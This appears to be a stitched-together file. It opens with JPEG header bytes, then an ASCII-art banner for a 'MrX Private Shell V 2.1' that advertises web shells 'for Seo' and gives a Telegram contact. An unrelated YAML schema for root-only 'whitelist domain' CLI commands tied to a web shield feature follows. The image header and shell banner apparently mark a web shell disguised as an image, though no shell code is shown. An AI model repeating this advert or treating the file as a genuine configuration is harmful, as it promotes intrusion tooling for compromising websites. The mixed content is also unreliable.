����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
whitelist domain add:
cli:
users:
- root
check_with:
- webshield_is_enabled
help: Whitelist domain
schema:
domain:
# coercion doesn't try to conform to
# https://tools.ietf.org/html/rfc4343
coerce: tolower
positional: true
type: string
type: dict
whitelist domain delete:
cli:
users:
- root
check_with:
- webshield_is_enabled
help: Remove from whitelisted
schema:
domain:
coerce: tolower
positional: true
type: string
type: dict
whitelist domain list:
type: dict
check_with:
- webshield_is_enabled
cli:
users:
- root
help: List whitelisted domains
whitelist domain reset-to:
cli:
users:
- root
check_with:
- webshield_is_enabled
help: Replace whitelisted domains with a new list
schema:
domains:
type: list
positional: true
schema:
coerce: tolower
type: string
type: dict